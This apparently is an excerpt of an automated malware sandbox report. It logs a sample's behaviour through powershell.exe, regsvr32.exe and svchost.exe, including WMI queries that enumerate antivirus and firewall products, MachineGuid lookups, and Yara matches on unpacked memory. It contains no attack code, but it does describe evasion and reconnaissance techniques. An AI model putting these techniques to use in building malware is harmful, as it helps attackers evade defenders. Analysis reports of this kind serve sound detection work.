Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 16_2_00007FFC65CF8900 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

16_2_00007FFC65CF8900

Source: C:\Windows\System32\regsvr32.exe

Code function: 16_2_00007FFC65CF8860 HeapCreate,GetVersion,HeapSetInformation,

16_2_00007FFC65CF8860

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Source: svchost.exe, 0000001D.00000002.506359620.00000210415F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe
Source: svchost.exe, 0000000C.00000002.504391777.0000023BC8A3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000C.00000002.504488461.0000023BC8B02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Files%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000C.00000002.504178254.0000023BC8A13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.504488461.0000023BC8B02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Source: Yara match	File source: 16.2.regsvr32.exe.28c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.regsvr32.exe.28c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.323155942.00000000028C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.505781692.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.505000054.0000000000C60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY